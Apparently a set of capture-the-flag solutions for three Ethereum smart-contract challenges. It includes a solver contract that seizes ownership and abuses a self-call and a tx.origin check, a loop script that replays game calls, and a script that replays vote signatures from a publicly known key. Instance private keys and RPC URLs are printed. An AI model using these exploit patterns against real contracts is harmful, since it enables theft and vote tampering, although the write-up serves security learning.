ExcellentMember
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "./Ownable.sol";
/// @title ExcellentMember
/// @notice Challenge contract: a membership registry whose goal flag `solved` is set by `solve()`.
/// @dev Security-relevant properties visible in this contract:
///      - the constructor registers the contract's own address as an excellent member;
///      - `adminCall` forwards an arbitrary low-level call, so the callee sees this contract
///        as `msg.sender`, including when the target is this contract itself;
///      - `solve()` authorises on `tx.origin`, not on `msg.sender`.
///      `adminCall` is gated only by `onlyOwner` from Ownable.sol, which is not shown on this
///      page; how ownership can change must be checked there.
contract ExcellentMember is Ownable {
    /// @notice Becomes true once `solve()` runs in a transaction originated by an excellent member.
    bool public solved;

    /// @notice Self-declared opt-in flag; each address sets its own entry through `setJoin`.
    mapping(address => bool) public join;

    /// @notice Whether an address has been registered as an excellent member.
    mapping(address => bool) public excellentMember;

    /// @notice List of registered excellent members, in registration order.
    address[] public excellentMembers;

    /// @dev Makes the deployer the owner and seeds the registry with this contract's address.
    constructor() Ownable(msg.sender) {
        address self = address(this);
        excellentMember[self] = true;
        excellentMembers.push(self);
    }

    /// @notice Owner-only arbitrary call made from this contract, forwarding the attached value.
    /// @dev Because the call originates here, any check of the form
    ///      `excellentMember[msg.sender]` in the callee is satisfied when the callee is this
    ///      contract. Whoever holds ownership therefore holds excellent-member rights.
    /// @param target Address to call.
    /// @param data Raw calldata to send.
    /// @return The raw return data of the call; reverts with "Fail Low-Level call" on failure.
    function adminCall(address target, bytes memory data) external payable onlyOwner returns (bytes memory) {
        (bool ok, bytes memory result) = target.call{value: msg.value}(data);
        require(ok, "Fail Low-Level call");
        return result;
    }

    /// @notice Records the caller's own opt-in choice. No access control: any address may call it.
    /// @param opinion Value stored in `join[msg.sender]`.
    function setJoin(bool opinion) external {
        join[msg.sender] = opinion;
    }

    /// @notice Registers `member` as an excellent member.
    /// @dev Author's note on the original line: entered via adminCall.
    ///      The checks run in this order: `member` not yet registered, `member` has opted in
    ///      through `setJoin`, and the caller is already an excellent member.
    /// @param member Address to register.
    function registryExcellentMember(address member) external {
        if (excellentMember[member]) revert("Already excellent member");
        if (!join[member]) revert("Set join");
        if (!excellentMember[msg.sender]) revert("Only excellent member");

        excellentMember[member] = true;
        excellentMembers.push(member);
    }

    /// @notice Sets `solved` when the transaction's originating account is an excellent member.
    /// @dev `tx.origin` is the externally owned account that started the transaction, so the
    ///      immediate caller is not what is being checked here. Does nothing (no revert) otherwise.
    function solve() external {
        if (excellentMember[tx.origin]) {
            solved = true;
        }
    }
}
// {
// "message": {
// "level_contract_address": "0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451",
// "user_private_key": "0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8",
// "user_address": "0xD2d66D72780D836919f3066d483f58890A035A08"
// }
// }
// http://host6.dreamhack.games:22022/383fe87a2e65/rpc
// cast send --private-key 0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8 --rpc-url http://host6.dreamhack.games:22022/383fe87a2e65/rpc 0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451 "setJoin(bool)" true
// 1. 외부에서 EoA로 setJoin하고
// 2. adminCall로 EoA excellentMember 등록
// forge create Solve --private-key 0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8 --rpc-url http://host6.dreamhack.games:22022/383fe87a2e65/rpc --constructor-args 0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451
// 3. EoA로 solve 호출
// cast send --private-key 0x57c0b9d2af1583e8eafde9e4e3dee1ba4fffc2fb40bbf87f1950d748800090d8 --rpc-url http://host6.dreamhack.games:22022/383fe87a2e65/rpc 0xB45031cA2f47AEa0a3bC6AC6d6f941bb07E18451 "solve()"
/// @notice Solver contract from the writeup; all of its work happens in the constructor.
/// @dev Steps performed on deployment:
///      1. take ownership of the challenge contract via `transferOwnership`. This only succeeds
///         if Ownable.sol (not shown on this page) lets a non-owner call it. That is presumably
///         the missing access control the challenge is built around; confirm in Ownable.sol.
///      2. as the new owner, use `adminCall` to make the challenge contract call its own
///         `registryExcellentMember` for the deployer. The challenge contract is itself a
///         registered member, so the "Only excellent member" check passes.
///      The deployer must already have called `setJoin(true)`, otherwise the inner call
///      reverts with "Set join". Defensive reading: owner-restricted ownership transfer
///      would stop step 1.
contract Solve {
    ExcellentMember public chall;

    /// @param _chall Address of the deployed ExcellentMember instance.
    constructor (address _chall) {
        ExcellentMember target = ExcellentMember(_chall);
        chall = target;

        // Step 1: become the owner so that the onlyOwner gate on adminCall is satisfied.
        target.transferOwnership(address(this));

        // Step 2: have the challenge contract register the deployer on its own behalf.
        target.adminCall(
            _chall,
            abi.encodeWithSelector(ExcellentMember.registryExcellentMember.selector, msg.sender)
        );
    }
}
DreamIdle
from web3 import Web3
import json
import time
# RPC endpoint of the challenge instance.
w3 = Web3(Web3.HTTPProvider("http://host6.dreamhack.games:22237/cd5c806e8a7e/rpc"))

# Connectivity check: prints True when the node answers.
print(w3.is_connected())

# Signing key and target contract for this instance.
# NOTE(review): presumably an instance-scoped key handed out by the challenge platform.
# A key pasted into a script is public to every reader, so this pattern only suits
# throwaway keys.
prikey = '0x3a2c14bc8b0a2fecad0093b1df71a5e7caf2d082b243b429550a7325a6b76a3f'
challenge_addr = "0xb5f33218b54489b6Cf362Be88C40F54AcaA13642"

# Pre-encoded calldata: a 4-byte selector followed by one 32-byte argument (0 or 1).
# The variable names suggest which contract function each selector belongs to; the
# contract source is not on this page, so treat that mapping as unverified.
initGame_0 = "c869ce640000000000000000000000000000000000000000000000000000000000000000"
initGame_1 = "c869ce640000000000000000000000000000000000000000000000000000000000000001"
sleep_1 = "fa9d87130000000000000000000000000000000000000000000000000000000000000001"
feed_0 = "f59dfdfb0000000000000000000000000000000000000000000000000000000000000000"
feed_1 = "f59dfdfb0000000000000000000000000000000000000000000000000000000000000001"
study_1 = "202457340000000000000000000000000000000000000000000000000000000000000001"
levelup_1 = "0ce90ec20000000000000000000000000000000000000000000000000000000000000001"
solve_1 = "b8b8d35a0000000000000000000000000000000000000000000000000000000000000001"

# Sender address derived from the key.
myAddr = w3.eth.account.from_key(prikey).address

# Values fetched once and reused for every transaction the script sends.
my_nonce = w3.eth.get_transaction_count(myAddr)
gasPrice = w3.eth.gas_price
chainId = w3.eth.chain_id
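def send_tx(value, data):
    """Sign and broadcast one legacy (gasPrice) transaction to the challenge contract.

    Args:
        value: Amount of wei to attach to the call.
        data: Hex-encoded calldata (selector plus arguments).

    Returns:
        The transaction hash returned by the node.

    The nonce is tracked locally in ``my_nonce`` rather than re-queried for each
    call. No receipt is fetched, so a transaction that reverts on-chain is not
    detected by this helper.
    """
    # Only the nonce is rebound; the other module-level values are read-only here.
    global my_nonce

    tx = {
        "from": myAddr,
        "to": challenge_addr,
        "nonce": my_nonce,
        "gasPrice": gasPrice,
        "value": value,
        "chainId": chainId,
        "data": data,
        "gas": 30000000,
    }
    signed_tx = w3.eth.account.sign_transaction(tx, prikey)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)

    # Advance the local nonce only after the node accepted the transaction. If signing
    # or broadcasting raises, the nonce stays unchanged and no gap is left in the
    # sender's sequence.
    my_nonce += 1
    return tx_hash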
# NOTE(review): the page lost its indentation. Each loop body is assumed to end at
# print(i), with the level-up call issued once after each loop. Confirm against the
# author's original script.

# One training cycle as written on the page: feed once, study three times, sleep once.
_training_cycle = (feed_1, study_1, study_1, study_1, sleep_1)

# Opening calls, in the order the writeup sends them.
for _opening_call in (initGame_0, feed_0, initGame_1):
    send_tx(0, _opening_call)

# First block of 150 cycles, then one level-up.
for cycle in range(150):
    for calldata in _training_cycle:
        send_tx(0, calldata)
    print(cycle)
send_tx(0, levelup_1)
print("level_up")

# Second block of 150 cycles, then one more level-up.
for cycle in range(150):
    for calldata in _training_cycle:
        send_tx(0, calldata)
    print(cycle)
send_tx(0, levelup_1)

# Final call carries 10**18 wei (1 ether) as its value.
send_tx(10**18, solve_1)
MagicVote
from web3 import Web3, HTTPProvider
from eth_account import Account
from eth_account.messages import encode_defunct
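# RPC endpoint of the challenge instance.
w3 = Web3(Web3.HTTPProvider("http://host3.dreamhack.games:11867/d738f32dc72c/rpc"))

# Connectivity check: prints True when the node answers.
print(w3.is_connected())

# Key that pays for and sends the transactions, and the contract under test.
# NOTE(review): presumably an instance-scoped key handed out by the challenge platform.
prikey = '0xb18184dd52cc15b7a86e2fc22e13f28d32162596b8c19a7a918cdd6db1b319b6'
challenge_addr = "0xbf8736b83ee325A550F06918aE59D5bB63C9D807"
myAddr = w3.eth.account.from_key(prikey).address

# Load the ABI with a context manager so the file is closed even if reading fails.
with open("abi.json", "r") as f:
    contract_abi = f.read()
contract = w3.eth.contract(abi=contract_abi, address=challenge_addr)

# Key used for the vote signatures. This is the secp256k1 scalar 1, whose public key
# is the curve's generator point, so it is known to everyone. Any address derived
# from it offers no authentication at all.
private_key = '0x0000000000000000000000000000000000000000000000000000000000000001'

# Message to be signed: a 4-byte selector, a 32-byte zero word, then a 32-byte word
# holding 1. NOTE(review): presumably the layout the contract hashes before signature
# recovery (the later vote call passes 0 and True). Confirm against the contract
# source, which is not on this page.
function_signature = bytes.fromhex('9abe73cf')
data = function_signature + b'\x00' * 32 + b'\x01'.rjust(32, b'\x00')
print(data.hex())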
import os
from ecdsa import SigningKey, SECP256k1, util
from Crypto.Hash import _keccak
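# Signing key object for the fixed scalar held in `private_key`.
sk = SigningKey.from_string(bytes.fromhex(private_key[2:]), curve=SECP256k1)

# Loop invariants: the digest being signed and the address a valid signature must
# recover to.
digest = w3.keccak(data)
expected_signer = Account.from_key(bytes.fromhex(private_key[2:])).address

for _ in range(6):
    # sign_digest() is called without an explicit k, so the ecdsa library chooses the
    # per-signature nonce itself. The original script also drew os.urandom(32) into an
    # unused variable; that value never reached the signer and is dropped here.
    # Each pass normally yields a different (r, s) over the same digest and key.
    # NOTE(review): a verifier that tracks used signatures by their bytes, not by the
    # recovered signer, would treat each as new. Presumably that is the property under
    # test; the contract source is not on this page.
    signature = sk.sign_digest(digest)
    r_bytes = signature[:32]
    s_bytes = signature[32:64]
    r = int.from_bytes(r_bytes, byteorder='big')
    s = int.from_bytes(s_bytes, byteorder='big')

    # sign_digest() does not return a recovery id, so try both legacy values and keep
    # the one that recovers the expected address.
    # Account._recover_hash is a private eth_account helper (leading underscore) and
    # may change between library versions.
    for v in [27, 28]:
        recovered = Account._recover_hash(message_hash=digest, vrs=(v, r, s))
        if recovered == expected_signer:
            print("Match found with v:", v)
            print(f"r: {hex(r)}, s: {hex(s)}, v: {v}")

            # Submit the vote with this signature; the transaction itself is signed
            # and paid for with `prikey`, not with the vote-signing key.
            func_call = contract.functions["vote"](0, True, v, r_bytes, s_bytes).build_transaction({
                "from": myAddr,
                "nonce": w3.eth.get_transaction_count(myAddr),
                "gasPrice": w3.eth.gas_price,
                "chainId": w3.eth.chain_id,
            })
            signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
            result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)

            # Wait for mining so the next iteration reads an up-to-date account nonce.
            transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
            print(transaction_receipt)
            break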